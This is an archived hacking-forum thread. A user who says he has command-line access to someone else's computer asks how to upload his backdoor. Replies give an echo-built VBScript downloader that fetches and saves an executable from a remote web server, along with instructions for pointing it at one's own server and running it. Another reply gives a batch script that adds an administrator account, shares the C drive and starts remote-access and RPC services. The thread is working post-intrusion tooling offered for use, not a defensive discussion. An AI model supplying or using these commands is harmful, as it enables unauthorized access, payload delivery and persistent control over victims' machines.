hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant

XtrA
hi
im in a remote computer by cmd..
i can delete.. i can make.. i can stop and kill but i fuckin` cant upload by tftp or echo !!
what should i do to put there my backdoor or so?
Copkill
Try the HTTP Script:

Look here:
http://www.governmentsecurity.org/forum/in...indpost&p=39512
CODE
echo Dim HTTPGET>>c:\madefile.vbs
echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP")>>c:\madefile.vbs
echo HTTPGET.Open "GET", "http://www.samplesite.com/file.exe", false>>c:\madefile.vbs
echo HTTPGET.Send>>c:\madefile.vbs
echo DataBin = HTTPGET.ResponseBody>>c:\madefile.vbs
echo Const adTypeBinary=1>>c:\madefile.vbs
echo Const adSaveCreateOverWrite=2>>c:\madefile.vbs
echo Dim SendBinary>>c:\madefile.vbs
echo Set SendBinary = CreateObject("ADODB.Stream")>>c:\madefile.vbs
echo SendBinary.Type = adTypeBinary>>c:\madefile.vbs
echo SendBinary.Open>>c:\madefile.vbs
echo SendBinary.Write DataBin>>c:\madefile.vbs
echo SendBinary.SaveToFile "c:\file.exe", adSaveCreateOverWrite>>c:\madefile.vbs

mrBob
how-to-hack question... dry.gif
XtrA
QUOTE (mrBob @ Feb 13 2004, 03:38 PM)
how-to-hack question... dry.gif

lol its not how to hack question
XtrA
QUOTE (Copkill @ Feb 13 2004, 03:02 PM)
Try the HTTP Script:

Look here:
http://www.governmentsecurity.org/forum/in...indpost&p=39512
CODE
echo Dim HTTPGET>>c:\madefile.vbs
echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP")>>c:\madefile.vbs
echo HTTPGET.Open "GET", "http://www.samplesite.com/file.exe", false>>c:\madefile.vbs
echo HTTPGET.Send>>c:\madefile.vbs
echo DataBin = HTTPGET.ResponseBody>>c:\madefile.vbs
echo Const adTypeBinary=1>>c:\madefile.vbs
echo Const adSaveCreateOverWrite=2>>c:\madefile.vbs
echo Dim SendBinary>>c:\madefile.vbs
echo Set SendBinary = CreateObject("ADODB.Stream")>>c:\madefile.vbs
echo SendBinary.Type = adTypeBinary>>c:\madefile.vbs
echo SendBinary.Open>>c:\madefile.vbs
echo SendBinary.Write DataBin>>c:\madefile.vbs
echo SendBinary.SaveToFile "c:\file.exe", adSaveCreateOverWrite>>c:\madefile.vbs

plz explain me more :\
i dont really understand where should i change things and how
Copkill
CODE
echo HTTPGET.Open "GET", "http://www.samplesite.com/file.exe", false>>c:\madefile.vbs


h**p://www.your-HTTP-Server.com/file-you-want-to-upload.exe

CODE
echo SendBinary.SaveToFile ""c:\file.exe, adSaveCreateOverWrite>>c:\madefile.vbs


echo SendBinary.SaveToFile "c:\file-you-want-to-upload.exe", adSaveCreateOverWrite>>c:\madefile.vbs

Then start the script

C:\madefile.vbs

it download then the file to C:\ from the HTTP Server.



rockerx
nice script!
thanx, iŽll try it
Thom
creat a user on the system, share C:\(net share C$=C:\) and start the RPC services
@echo off
net user /add User PASS
net localgroup administrators USER /add
net start RasAuto
net start RasMan
net start RpcSs
net start RpcLocator
net start RemoteRegistry
net start RemoteAccess

something like that
DumpZ
Why do u need to start the RPC services ? I that needed to transfer the files thru http?
Qlimax
next time look @ Tutorials & tip's topic's.
Thom
RPC services are needed for remote connections.

Hey Qlimax, didnt know you were here ^^
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.

 
Invision Power Board © 2001-2005 Invision Power Services, Inc.